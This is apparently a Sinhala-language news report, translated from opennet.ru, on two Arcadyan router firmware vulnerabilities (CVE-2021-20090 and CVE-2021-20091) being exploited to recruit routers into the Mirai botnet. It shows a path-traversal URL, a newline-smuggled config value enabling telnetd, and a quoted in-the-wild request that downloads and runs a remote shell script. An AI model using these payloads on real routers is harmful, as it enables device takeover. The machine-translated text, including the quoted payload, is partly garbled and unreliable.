නිෂ්පාදකයින් 17 දෙනෙකුට බලපාන ගෘහස්ථ රවුටරවල අවදානම

Arcadyan සමාගමෙන් HTTP සේවාදායක ක්‍රියාත්මක කිරීමක් භාවිතා කරන ස්ථිරාංග සහිත ගෘහ රවුටර වලට එරෙහිව ජාලයේ දැවැන්ත ප්‍රහාරයක් වාර්තා වී ඇත. උපාංග පාලනය කිරීම සඳහා, මූල අයිතිවාසිකම් සමඟ අත්තනෝමතික කේතය දුරස්ථව ක්‍රියාත්මක කිරීමට ඉඩ සලසන දුර්වලතා දෙකක එකතුවක් භාවිතා කරයි. මෙම ගැටළුව Arcadyan, ASUS සහ Buffalo වෙතින් තරමක් පුළුල් පරාසයක ADSL රවුටරවලට මෙන්ම Beeline සන්නාම යටතේ සපයන උපාංග (Smart Box Flash හි ගැටලුව තහවුරු වේ), Deutsche Telekom, Orange, O2, Telus, Verizon, Vodafone සහ අනෙකුත් ටෙලිකොම් ක්රියාකරුවන්. මෙම ගැටළුව වසර 10 කට වැඩි කාලයක් Arcadyan ස්ථිරාංග වල පවතින අතර මෙම කාලය තුළ විවිධ නිෂ්පාදකයින් 20 කින් අවම වශයෙන් උපාංග මාදිලි 17 කට සංක්‍රමණය වීමට සමත් වී ඇත.

පළමු අවදානම, CVE-2021-20090, සත්‍යාපනයකින් තොරව ඕනෑම වෙබ් අතුරු මුහුණත් ස්ක්‍රිප්ට් වෙත ප්‍රවේශ වීමට හැකි කරයි. අවදානමේ සාරය නම්, වෙබ් අතුරු මුහුණත තුළ, පින්තූර, CSS ගොනු සහ JavaScript ස්ක්‍රිප්ට් යවන සමහර නාමාවලි සත්‍යාපනයකින් තොරව ප්‍රවේශ විය හැකි වීමයි. මෙම අවස්ථාවෙහිදී, සත්‍යාපනයකින් තොරව ප්‍රවේශ වීමට අවසර දී ඇති නාමාවලි ආරම්භක මාස්ක් භාවිතයෙන් පරීක්ෂා කරනු ලැබේ. මාපිය ඩිරෙක්ටරිය වෙත යාමට මාර්ගවල “../” අක්ෂර සඳහන් කිරීම ස්ථිරාංග මඟින් අවහිර කර ඇත, නමුත් “..% 2f” සංයෝජනය භාවිතා කිරීම මඟ හරිනු ලැබේ. මේ අනුව, "http://192.168.1.1/images/..%2findex.htm" වැනි ඉල්ලීම් යැවීමේදී ආරක්ෂිත පිටු විවෘත කිරීමට හැකි වේ.

දෙවන අවදානම, CVE-2021-20091, පරාමිතිවල නව රේඛා අක්ෂරයක් තිබේදැයි පරීක්ෂා නොකරන, විශේෂයෙන් ෆෝමැට් කරන ලද පරාමිති apply_abstract.cgi ස්ක්‍රිප්ට් වෙත යැවීමෙන් සත්‍යාපිත පරිශීලකයෙකුට උපාංගයේ පද්ධති සැකසුම් වෙනස් කිරීමට ඉඩ සලසයි. . උදාහරණයක් ලෙස, ping මෙහෙයුමක් සිදු කරන විට, ප්‍රහාරකයෙකුට "192.168.1.2%0AARC_SYS_TelnetdEnable=1" යන IP ලිපිනය පිරික්සමින් ඇති ක්ෂේත්‍රයේ අගය සහ /tmp/etc/config/ සැකසීම් ගොනුව සාදන විට ස්ක්‍රිප්ටය නියම කළ හැක. .glbcfg, එය තුලට “AARC_SYS_TelnetdEnable=1” යන පේළිය ලියා ඇත, එය telnetd සේවාදායකය සක්‍රිය කරයි, එය මූල අයිතිවාසිකම් සමඟ සීමා රහිත විධාන කවච ප්‍රවේශය සපයයි. ඒ හා සමානව, AARC_SYS පරාමිතිය සැකසීමෙන්, ඔබට පද්ධතියේ ඕනෑම කේතයක් ක්‍රියාත්මක කළ හැක. පළමු දුර්වලතාවය "/images/..%2fapply_abstract.cgi" ලෙස ප්‍රවේශ වීමෙන් සත්‍යාපනයකින් තොරව ගැටළු සහගත ස්ක්‍රිප්ට් එකක් ධාවනය කිරීමට හැකි වේ.

දුර්වලතා ප්‍රයෝජනයට ගැනීමට, වෙබ් අතුරු මුහුණත ක්‍රියාත්මක වන ජාල තොටට ඉල්ලීමක් යැවීමට ප්‍රහාරකයෙකුට හැකි විය යුතුය. ප්රහාරයේ ව්යාප්තියේ ගතිකත්වය අනුව විනිශ්චය කිරීම, උපකාරක සේවාව මගින් ගැටළු හඳුනා ගැනීම සරල කිරීම සඳහා බොහෝ ක්රියාකරුවන් බාහිර ජාලයෙන් ඔවුන්ගේ උපාංග වෙත ප්රවේශය ලබා දෙයි. අතුරු මුහුණතට ප්රවේශය අභ්යන්තර ජාලයට පමණක් සීමා වී ඇත්නම්, "DNS rebinding" තාක්ෂණය භාවිතයෙන් බාහිර ජාලයකින් ප්රහාරයක් සිදු කළ හැකිය. Mirai botnet වෙත රවුටර සම්බන්ධ කිරීම සඳහා දුර්වලතා දැනටමත් සක්‍රියව භාවිතා වේ: POST /images/..%2fapply_abstract.cgi HTTP/1.1 සම්බන්ධතාවය: පරිශීලක-නියෝජිතය වසන්න: අඳුරු ක්‍රියාව=ආරම්භක&submit_button=ping.html& action_params=3dip_5_pams=blinktime212.192.241.7. 0%1A ARC_SYS_TelnetdEnable=0&%212.192.241.72AARC_SYS_=cd+/tmp; wget+http://212.192.241.72/lolol.sh; curl+-O+http://777/lolol.sh; chmod+0+lolol.sh; sh+lolol.sh&ARC_ping_status=4&TMP_Ping_Type=XNUMX

මූලාශ්රය: opennet.ru

අදහස් එක් කරන්න